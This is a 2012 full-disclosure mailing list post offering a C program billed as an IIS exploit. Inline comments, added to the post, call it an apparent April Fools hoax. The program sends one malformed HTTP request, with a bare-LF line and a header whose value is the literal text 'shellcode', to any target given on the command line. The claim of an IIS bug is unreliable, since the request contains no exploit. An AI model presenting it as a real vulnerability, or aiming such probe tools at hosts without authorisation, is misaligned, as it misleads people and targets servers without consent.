Message-ID: <SNT104-W654693ADB8B6900544D877C44F0@phx.gbl>
Date: Sun, 1 Apr 2012 07:51:09 +0000
From: yuange <yuange1975@...mail.com>
To: full-disclosure <full-disclosure@...ts.grok.org.uk>
Subject: FW: iis bug
the exp file. /* iisexp41.c ver4.1 copy by @yuange1975 2012.4.1
假作真时真亦假。 ("When the false is taken as true, the true becomes false" -- Dream of the Red Chamber; read the payload below before taking the subject line at face value.) http://weibo.com/yuange1975
http://twitter.com/yuange75
http://hi.baidu.com/yuange1975/blog/item/ac368655017819dbb745aeee.html
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <winsock2.h>
#include <windows.h>
#include <mswsock.h>
#include <wsnwlink.h>
#include <ws2tcpip.h>
#include <process.h> /* _beginthread, _endthread */
#include <io.h>
#include <conio.h>
#pragma comment(lib,"ws2_32")
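#pragma comment(lib,"Mswsock")

/*
 * The request this program sends, verbatim.  Read it before believing the
 * subject line: it is a GET for a non-existent .php resource, a Host header,
 * the line "a=b" terminated by a bare LF (no CR) instead of CRLF, and a
 * header whose value is the literal ASCII text "shellcode".  There is no
 * machine code in it and no memory-corruption primitive; at most it probes
 * how a server treats a malformed header line.  On its own it does not
 * demonstrate an IIS vulnerability, and the file is dated 1 April -- treat
 * the "iis bug" claim as unverified.  Kept byte-for-byte so the program
 * sends exactly what was posted.
 */
char *AprilFoolsDay ="GET /AprilFools'Day.php HTTP/1.1\r\nHOST:weibo.com/yuange1975\r\na=b\nc:shellcode\r\n\r\n";

/*
 * Resolve `name` to an IPv4 address in network byte order.
 *
 * A dotted-quad literal is converted directly; anything else is handed to
 * getaddrinfo() restricted to AF_INET (WSAStartup must already have run).
 * Returns 0 when the name cannot be resolved, so callers must check for 0
 * before building a sockaddr from the result -- the original returned 0 for
 * every non-numeric host and the caller then connected to 0.0.0.0.
 *
 * Note: inet_addr() reports 255.255.255.255 as INADDR_NONE, so the limited
 * broadcast address is rejected here; acceptable for a unicast HTTP client.
 */
static unsigned int maybe_lookup_host(char* name)
{
    unsigned long ulAddr;
    struct addrinfo hints;
    struct addrinfo *res = NULL;
    unsigned int out = 0;

    if (name == NULL || *name == '\0')
        return 0;

    /* Fast path: raw IP literal, no resolver round-trip. */
    ulAddr = inet_addr(name);
    if (ulAddr != INADDR_NONE && ulAddr != INADDR_ANY)
        return (unsigned int)ulAddr;

    memset(&hints, 0, sizeof hints);
    hints.ai_family = AF_INET;          /* the caller's sockaddr_in is IPv4-only */
    hints.ai_socktype = SOCK_STREAM;
    hints.ai_protocol = IPPROTO_TCP;

    if (getaddrinfo(name, NULL, &hints, &res) != 0 || res == NULL)
        return 0;

    /* Take the first IPv4 answer; 0.0.0.0 is not a usable peer. */
    if (res->ai_family == AF_INET && res->ai_addr != NULL)
        memcpy(&out, &((struct sockaddr_in *)res->ai_addr)->sin_addr, sizeof out);
    freeaddrinfo(res);
    return out == INADDR_ANY ? 0 : out;
}

/*
 * Connect to hostname:port over TCP, send AprilFoolsDay once, and close.
 *
 * Returns 0 when the whole request was written, -1 on any failure
 * (bad port, name resolution, socket creation, connect, send).
 * Diagnostics go to stdout.  The socket is blocking, so connect() either
 * succeeds or fails outright; WSAEWOULDBLOCK cannot occur here and the
 * original's special case for it was dead code.
 */
int do_exp(char *hostname,unsigned int port)
{
    SOCKET hSocket = INVALID_SOCKET;
    struct sockaddr_in sin;
    unsigned int addr;
    const char *crash_buf;
    int crash_buflen;
    int sent_total = 0;
    int err;

    /* htons() below would silently truncate anything wider than 16 bits. */
    if (port == 0 || port > 65535) {
        printf_s("invalid port %u (expected 1-65535)\n", port);
        return -1;
    }

    /* Resolve first: no point opening a socket for a name we cannot use. */
    addr = maybe_lookup_host(hostname);
    if (addr == 0) {
        printf_s("cannot resolve host '%s'\n", hostname);
        return -1;
    }

    hSocket = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0/*WSA_FLAG_OVERLAPPED*/);
    if (hSocket == INVALID_SOCKET) {
        printf_s("WSASocket function failed with error = %d\n", WSAGetLastError() );
        return -1;
    }

    /* Zero the whole struct: sin_zero padding was left uninitialised before. */
    memset(&sin, 0, sizeof sin);
    sin.sin_family = AF_INET;
    sin.sin_port = htons((unsigned short)port);
    memcpy(&sin.sin_addr, &addr, sizeof sin.sin_addr);

    if (connect(hSocket, (struct sockaddr*) &sin, sizeof sin) == SOCKET_ERROR) {
        /* Capture the error before closesocket() can overwrite it. */
        err = WSAGetLastError();
        closesocket(hSocket);
        printf_s("connect function failed with error: %d\n", err);
        return -1;
    }
    printf("[*] connected to %s:%u\n", hostname, port);

    /* The request is the fixed string above; nothing is built at runtime. */
    crash_buf = AprilFoolsDay;
    crash_buflen = (int)strlen(AprilFoolsDay);

    /* send() may write fewer bytes than asked even on a blocking socket, and
     * returns SOCKET_ERROR on failure -- the original printed "-1 bytes". */
    while (sent_total < crash_buflen) {
        int n = send(hSocket, crash_buf + sent_total, crash_buflen - sent_total, 0);
        if (n == SOCKET_ERROR) {
            err = WSAGetLastError();
            closesocket(hSocket);
            printf_s("send failed with error: %d\n", err);
            return -1;
        }
        sent_total += n;
    }
    printf("[*] send %d bytes\n", sent_total);

    closesocket(hSocket);
    return 0;
}

/*
 * Usage: iisexp41 <target_ip_or_host> [port]
 *
 * Port defaults to 80; when given it must parse fully as 1..65535.
 * Exit status is 0 when the request was sent, 1 on a usage error or a
 * failed attempt, -1 when Winsock could not be initialised.
 * argc is checked before argv[1] is read (the original read it first).
 */
int main(int argc, const char **argv)
{
    int iResult;
    WSADATA wsaData;
    const char *target;
    unsigned long port = 80;
    int rc;

    if (argc < 2 || argv[1] == NULL || argv[1][0] == '\0') {
        printf_s("usage: <target_ip> [port]\n");
        return 1;
    }
    target = argv[1];

    if (argc > 2) {
        char *end = NULL;
        errno = 0;
        port = strtoul(argv[2], &end, 10);
        if (end == argv[2] || *end != '\0' || errno == ERANGE || port == 0 || port > 65535) {
            printf_s("invalid port '%s' (expected 1-65535)\n", argv[2]);
            return 1;
        }
    }

    /* Initialize Winsock */
    iResult = WSAStartup(MAKEWORD(2, 2), &wsaData);
    if (iResult != 0) {
        printf_s("WSAStartup failed: %d\n", iResult);
        return -1;
    }

    /* do_exp takes a non-const name but only reads it, so the cast is safe. */
    rc = do_exp((char *)target, (unsigned int)port);

    /* clean - win socket */
    WSACleanup();
    return rc == 0 ? 0 : 1;
}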
From: yuange1975@...mail.com
To: full-disclosure@...ts.grok.org.uk
Subject: iis bug
Date: Sun, 1 Apr 2012 03:30:29 +0000
iis new bug:
http://weibo.com/yuange1975
poc (note: this single malformed HTTP request is the entire "exploit"; the "shellcode" header value is literal ASCII text, so it does not by itself demonstrate a vulnerability):
char *AprilFoolsDay ="GET /AprilFools'Day.php HTTP/1.1\r\nHOST:http://weibo.com/yuange1975\r\na=b\nc:shellcode\r\n\r\n";